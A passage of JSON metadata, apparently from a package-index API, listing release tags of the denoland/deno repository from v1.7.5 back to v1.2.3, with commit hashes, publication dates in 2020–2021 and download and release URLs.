ies/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6e